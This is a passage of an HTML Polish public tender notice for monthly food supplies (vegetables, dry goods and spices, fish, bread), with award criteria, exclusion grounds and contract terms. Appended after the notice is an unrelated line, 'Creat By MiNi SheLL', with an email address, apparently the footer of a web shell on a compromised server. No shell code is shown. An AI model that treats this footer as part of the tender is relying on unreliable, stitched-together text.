4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> warzywa i przetwory warzywne<br/>Lp.	Nazwa produktu	zapotrzebowanie na m-c	jednostki<br/>1	ziemniaki	750	kg<br/>2	ziemniaki młode	100	kg<br/>3	marchew	59	kg<br/>4	pietruszka	27	kg<br/>5	por	60	kg<br/>6	pieczarki	16	kg<br/>7	pomidory	13	kg<br/>8	ogórki świeże	20	kg<br/>9	groch połówki 400g Kupiec lub równoważny	8	szt.<br/>10	koper	26	p<br/>11	natka pietruszki	16	p<br/>12	cebula	19	kg<br/>13	cebula czerwona	2	kg<br/>14	kapusta pekińska	13	kg<br/>15	kapusta biała	12	kg<br/>16	kapusta młoda w sezonie	7	szt.<br/>17	kapusta kwaszona	29	kg<br/>18	seler	22	kg<br/>19	fasola szparagowa świeża	7	szt<br/>20	fasola biała drobna 500g Kupiec lub rówmoważna	2	szt.<br/>21	kalafior mrożony 450 g	19	szt.<br/>22	szpinak mrożony 450g Hortex lub równoważny	1	szt.<br/>23	fasola szparagowa mrożona 450g Unifreeze lub równoważna	14	szt.<br/>24	sałata zwykła	15	szt.<br/>25	sałata lodowa	10	szt.<br/>26	koncentrat pomidorowy 30% 190g Łowicz lub równoważny	44	szt.<br/>27	rzodkiewka	7	p<br/>28	chrzan biały w słoiku 200g Victus lub równoważny	2	szt<br/>29	kapusta czerwona	5	kg<br/>30	ogórki konserwowe Urbanek 0,92l lub równoważne	16	szt<br/>31	ogórki kwaszone	15	kg<br/>32	kapusta włoska	1	szt.<br/>33	przecier szczawiowy siekany w słoiku 200g	18	szt.<br/>34	barszcz ukraiński 400g Unifreeze lub równoważny	20	szt<br/>35	mieszanka 7-mio sładnikowa Unifreeze lub równoważna	10	szt.<br/>36	buraki ćwikłowe	33	kg<br/>37	groszek zielony mrożony - 450 g Hortex lub równoważny	1	szt.<br/>38	kukurydza w puszce 400g Kwidzyn lub równoważna	4	szt.<br/>39	groszek zielony w puszce 450g Kwidzyn lub równoważny	6	szt<br/>40	marchewka z groszkiem 450g Unifreeze lub równoważna	10	szt<br/>41	brokuł świeży	1	szt<br/>42	szczypiorek	8	p<br/>43	papryka surowa	4	kg<br/>44	czosnek	4	szt.<br/>45	soczewica czerwona 350g Sante lub równoważna	1	kg<br/>46	marcheweczki mini mrożone 450g Unifreeze lub równoważne	10	szt.<br/>47	bukiet warzyw 450g Unifreeze lub równoważny	6	szt<br/>48	brokuł mrożony 450g Unifreeze lub równoważny	6	szt.<br/>49	sałatka szwedzka Urbanek 360g lub równoważna	8	szt<br/>50	pomidory koktajlowe cherry 250g	8	szt. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15300000-1 - Owoce, warzywa i podobne produkty</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami i ich wagami:<br/>Nazwa kryterium:	Waga<br/>cena za wykonanie całości zamówienia	100 %<br/><br/>Komisja przetargowa dokona oceny ofert w oparciu o kryterium zawarte w SWZ, przyznając każdej ofercie od 0 do 100 pkt.<br/>Oferta z najniższą ceną otrzyma 100 pkt, a pozostałe oferty otrzymają ilość punktów wyliczoną wg poniższej formuły:<br/> Cmin<br/> Yn = __________ x 100 pkt.<br/> Cn<br/>Gdzie:<br/>Yn - ilość punktów przyznanych ocenianej ofercie,<br/>Cmin	- najniższa cena ofertowa zaoferowana w ważnej ofercie,<br/>Cn - cena ofertowa ocenianej oferty</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przyprawy, makarony, mąki, kasze <br/>Lp.	Nazwa produktu	zapotrzebowanie na m-c	jednostki<br/>1	mąka szymanowska lub równoważna typ 480	23	kg<br/>2	mąka pszenna „Basia” typ 500 lub równoważna	10	kg<br/>3	mąka ziemniaczana Kupiec lub równoważna	1	kg<br/>4	ciasto francuskie	5	szt.<br/>5	makaron świderki 400g Lubella lub równoważny	105	szt.<br/>6	makaron rosołowy 400g Vela lub równoważny	52	szt.<br/>7	makaron krajanka 400g Vela lub równoważny	51	szt.<br/>8	makaron wieloziarnisty świderki Lubella 400g lub równoważny	8	szt.<br/>9	makaron spaghetti 400g Lubella lub równoważny	21	szt.<br/>10	makaron pióra 400g Lubella lub równoważny	6	szt.<br/>11	makaron kokardki mini 400g Lubella luz równoważny	18	szt.<br/>12	makaron gwiazdki 250g Czaniecki lub równoważny	12	szt.<br/>13	makaron wstążaka średnia 500g	11	szt.<br/>14	ryż w saszetkach Kupiec 400g lub równoważny	22	szt.<br/>15	ryż 1kg Kupiec lub równoważny	16	szt.<br/>16	kasza manna 1kg Kupiec lub równoważna	1	kg<br/>17	kasza jęczmienna 400g Kupiec lub równoważna	17	szt.<br/>18	kasza gryczana jasna w saszetkach 400g Kupiec lub równoważna	4	szt.<br/>19	kasza bulgur 400g Melvit lub równoważna	8	szt<br/>20	kasza kus-kus 400 g	4	szt<br/>21	płatki owsiane 400g Kupiec lub równoważne	3	szt.<br/>22	cukier	88	szt.<br/>23	cukier waniliowy 16g Delecta lub równoważny	19	szt.<br/>24	sól	3	szt<br/>25	sól alpejska	9	szt.<br/>26	sól peklowa	1	szt.<br/>27	kwasek cytrynowy 50g Winiary lub równoważny	9	szt<br/>28	liść laurowy Apetitta lub równoważny	9	szt<br/>29	keczup łagodny w tubie 480g Włocławek lub równoważny	4	szt.<br/>30	keczup 900g	4	szt<br/>31	przyprawa vegeta Podravka 200g lub równoważna	58	szt<br/>32	zupa pieczarkowa Winiary 45g lub równoważna	12	szt<br/>33	barszcz biały 165g Winiary lub równoważny	39	szt<br/>34	majeranek 20g Cykoria lub równoważny	13	szt<br/>35	papryka słodka mielona 20g Apetitta lub równoważna	9	kg<br/>36	pieprz mielony 20g Prymat lub równoważny	16	szt.<br/>37	kurkuma 20g Prymat lub równoważna	2	kg<br/>38	tymianek 10g Apetitta lub równoważny	2	szt.<br/>39	zioła prowansalskie 10g Apetitta lub równoważne	4	szt.<br/>40	rozmaryn 15g Kamis lub równoważny	1	szt.<br/>41	gałka muszkatułowa mielona 15 g Appetita lub równoważna	1	szt.<br/>42	oregano 10g Apetitta lub równoważna	1	szt<br/>43	bazylia 10g Apetitta lub równoważna	1	szt<br/>44	ziele angielskie 20g Prymat lub równoważne	4	szt.<br/>45	słonecznik łuskany	1	szt.<br/>46	bulion warzywny	1	szt.<br/>47	płatki kukurydziane Corn Flakes 600g lub równoważne	5	szt.<br/>48	jajka duże	480	szt<br/>49	smalec wieprzowy 200g	9	szt.<br/>50	olej uniwersalny 1l Kujawski lub równoważny	55	szt<br/>51	oliwa z oliwek 0,5 l Bulerias lub równoważna	1	szt.<br/>52	majonez pomorski Ocetix 620g lub równoważny	7	szt<br/>53	Ocet 0,5 l 10%	1	szt.<br/>54	Żurek 05 litra	3	szt.<br/>55	cynamon 15g Apetitta lub równoważny	1	szt.<br/>56	pieprz w ziarnach 20g	11	szt<br/>57	budyń 64g Delecta lub równoważny	16	szt.<br/>58	Kisiel 58 g Delecta lub równoważny	16	szt.<br/>59	galaretka Delecta 75 g lub równoważna	43	szt<br/>60	herbata ekspresowa 50 torebek Lipton lub równoważna	2	szt.<br/>61	herbata ekspresowa owocowa 25 torebek Saga lub równoważna	8	szt<br/>62	herbata granulowana Lipton 90g lub równoważna	5	szt.<br/>63	mięta w saszetkach 30g Herbapol lub równoważna	10	szt<br/>64	kawa inka	4	szt.<br/>65	kakao granulowane Puchatek 350g lub równoważne	7	szt.<br/>66	musztarda sarepska 280g Kamis w tubie lub równoważna	1	szt.<br/>67	musztarda francuska 280g Kamis lub równoważna	1	szt<br/>68	miód naturalny wielokwiatowy Baśniowa Pasieka 350g lub równoważny	1	szt<br/>69	miód naturalny wielokwiatowy 950g 8	szt<br/>70	sos spaghetti Łowicz 350 g lub równoważny	30	szt<br/>71	sos sałatkowy Knorr 9 g lub równoważny	5	szt.<br/>72	sos buraczany 200 g	5	szt.<br/>73	koncentrat buraczany Krakus 200 g	2	szt<br/>74	sos grzybowy 40 g Winiary lub równoważny	8	szt<br/>75	sos pieczarkowy 35 g Winiary lub równoważny	3	szt<br/>76	sos słodko-kwąsny 350 g Łowicz lub równoważny	80	szt<br/>77	fix spaghetti 4 sery z brokułami Knorr 48 g lub równoważny	5	szt<br/>78	krem czekoladowy Nutella 350g lub równoważny	4	szt.<br/>79	zacierki 250g Abak lub równoważny	4	szt.<br/>80	woda niegazowana 1,5l Cisowianka lub równoważna	120	szt.<br/>81	filiżanki jednorazowe 200 szt	1	szt. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15800000-6 - Różne produkty spożywcze</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami i ich wagami:<br/>Nazwa kryterium:	Waga<br/>cena za wykonanie całości zamówienia	100 %<br/><br/>Komisja przetargowa dokona oceny ofert w oparciu o kryterium zawarte w SWZ, przyznając każdej ofercie od 0 do 100 pkt.<br/>Oferta z najniższą ceną otrzyma 100 pkt, a pozostałe oferty otrzymają ilość punktów wyliczoną wg poniższej formuły:<br/> Cmin<br/> Yn = __________ x 100 pkt.<br/> Cn<br/>Gdzie:<br/>Yn - ilość punktów przyznanych ocenianej ofercie,<br/>Cmin	- najniższa cena ofertowa zaoferowana w ważnej ofercie,<br/>Cn - cena ofertowa ocenianej oferty</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Ryby <br/>Lp.	Nazwa produktu	zapotrzebowanie na m-c	jednostki<br/>1	ryba mrożona Dorsz	25	kg<br/>2	ryba mrożona Miruna	40	kg<br/>3	makrela wędzona	1	kg<br/>4	filet z makreli w puszce 174g Graal lub równoważny	3	szt </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15200000-0 - Ryby przetworzone i konserwowane</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami i ich wagami:<br/>Nazwa kryterium:	Waga<br/>cena za wykonanie całości zamówienia	100 %<br/><br/>Komisja przetargowa dokona oceny ofert w oparciu o kryterium zawarte w SWZ, przyznając każdej ofercie od 0 do 100 pkt.<br/>Oferta z najniższą ceną otrzyma 100 pkt, a pozostałe oferty otrzymają ilość punktów wyliczoną wg poniższej formuły:<br/> Cmin<br/> Yn = __________ x 100 pkt.<br/> Cn<br/>Gdzie:<br/>Yn - ilość punktów przyznanych ocenianej ofercie,<br/>Cmin	- najniższa cena ofertowa zaoferowana w ważnej ofercie,<br/>Cn - cena ofertowa ocenianej oferty</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Pieczywo <br/>Lp.	Nazwa produktu	zapotrzebowanie na m-c	jednostki<br/>1	chleb pełnoziarnisty krojony	6	szt.<br/>2	chleb krojony Słubicki smak	120	szt.<br/>3	bułka grahamka	40	szt.<br/>4	bułka poznańska	45	szt.<br/>5	bułka kajzerka	120	szt.<br/>6	bułka tarta	28	szt.<br/>7	bułka słodka z kruszonką	30	szt.<br/>8	bułka słodka z budyniem	25	szt.<br/>9	rogale z jabłkiem	25	szt.<br/>10	bułeczki mleczne 400g Dan Cake lub równoważne	16	szt.<br/>11	pączki	1	szt.<br/>12	placek drożdżowy mały foremka	8	szt.<br/>13	chałka	16	szt. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15810000-9 - Pieczywo, świeże wyroby piekarskie i ciastkarskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami i ich wagami:<br/>Nazwa kryterium:	Waga<br/>cena za wykonanie całości zamówienia	100 %<br/><br/>Komisja przetargowa dokona oceny ofert w oparciu o kryterium zawarte w SWZ, przyznając każdej ofercie od 0 do 100 pkt.<br/>Oferta z najniższą ceną otrzyma 100 pkt, a pozostałe oferty otrzymają ilość punktów wyliczoną wg poniższej formuły:<br/> Cmin<br/> Yn = __________ x 100 pkt.<br/> Cn<br/>Gdzie:<br/>Yn - ilość punktów przyznanych ocenianej ofercie,<br/>Cmin	- najniższa cena ofertowa zaoferowana w ważnej ofercie,<br/>Cn - cena ofertowa ocenianej oferty</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) Pełnomocnictwo osoby lub osób podpisujących ofertę - jeżeli uprawnienie do podpisu nie wynika bezpośrednio z załączonych dokumentów.<br/>2) W przypadku złożenia oferty wspólnej – pełnomocnictwo udzielone liderowi.<br/>3) Zobowiązanie podmiotu udostępniającego zasoby – Załącznik Nr 3 lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów. /jeżeli dotyczy/<br/>4) Oświadczenie z art. 117 ust. 4 Pzp - Wykonawcy wspólnie ubiegającego się o udzielenie<br/>zamówienia – Załącznik Nr 4./jeżeli dotyczy/<br/>5) Kalkulacja cenowa – załącznik nr 7. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1) W przypadku złożenia oferty wspólnej Wykonawcy ustanawiają pełnomocnika<br/>do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania<br/>w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>2) Oferta wspólna musi spełniać wymagania:<br/>a) oświadczenie, o którym mowa w pkt 1 ppkt 1 składa:<br/>- każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia w zakresie,<br/>w jakim każdy z wykonawców wykazuje spełnienie warunków udziału w postępowaniu<br/>lub<br/>- pełnomocnik (umocowany do składania oświadczeń wiedzy) w imieniu każdego<br/>z wykonawców osobno.<br/>b) oświadczenie, o którym mowa w pkt 1 ppkt 2 składa:<br/>- każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia(na oddzielnym formularzu)<br/>lub<br/>- pełnomocnik (umocowany do składania oświadczeń wiedzy) w imieniu każdego przypadku złożenia oferty wspólnej – pełnomocnictwo udzielone liderowi. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> § 7<br/>1. Wszelkie zmiany i uzupełnienia treści niniejszej umowy mogą być dokonane za zgodą obu stron wyrażoną na piśmie pod rygorem nieważności.<br/>2. Zamawiający dopuszcza możliwość dokonania w umowie następujących zmian:<br/>2.1.zmiana gramatury dostarczanych produktów w przypadku wprowadzenia przez producenta innej gramatury niż określona w ofercie Wykonawcy,<br/>2.2. zmiana asortymentu w przypadku wstrzymania, zaprzestania produkcji, wycofania z rynku lub zmiany marki, z zastrzeżeniem, iż oferowany zamiennik musi odpowiadać parametrom co najmniej takim jak oferowany produkt, z gwarancję zachowania oferowanej ceny,<br/>2.3. zmiana cen produktów w przypadku, gdy z powodu istotnej zmiany ceny nieprzewidzianej przy zawarciu umowy, spełnienie przedmiotu umowy groziłoby jednej ze stron rażącą stratą,<br/>2.4. zmiana ilości w poszczególnych grupach asortymentowych artykułów wymienionych <br/>w załączniku nr 1do umowy z zachowaniem cen jednostkowych, <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-08-11 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę w postępowaniu, za pomocą Platformy e-Zamówienia dostępniej pod adresem: https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-08-11 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-09-09</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com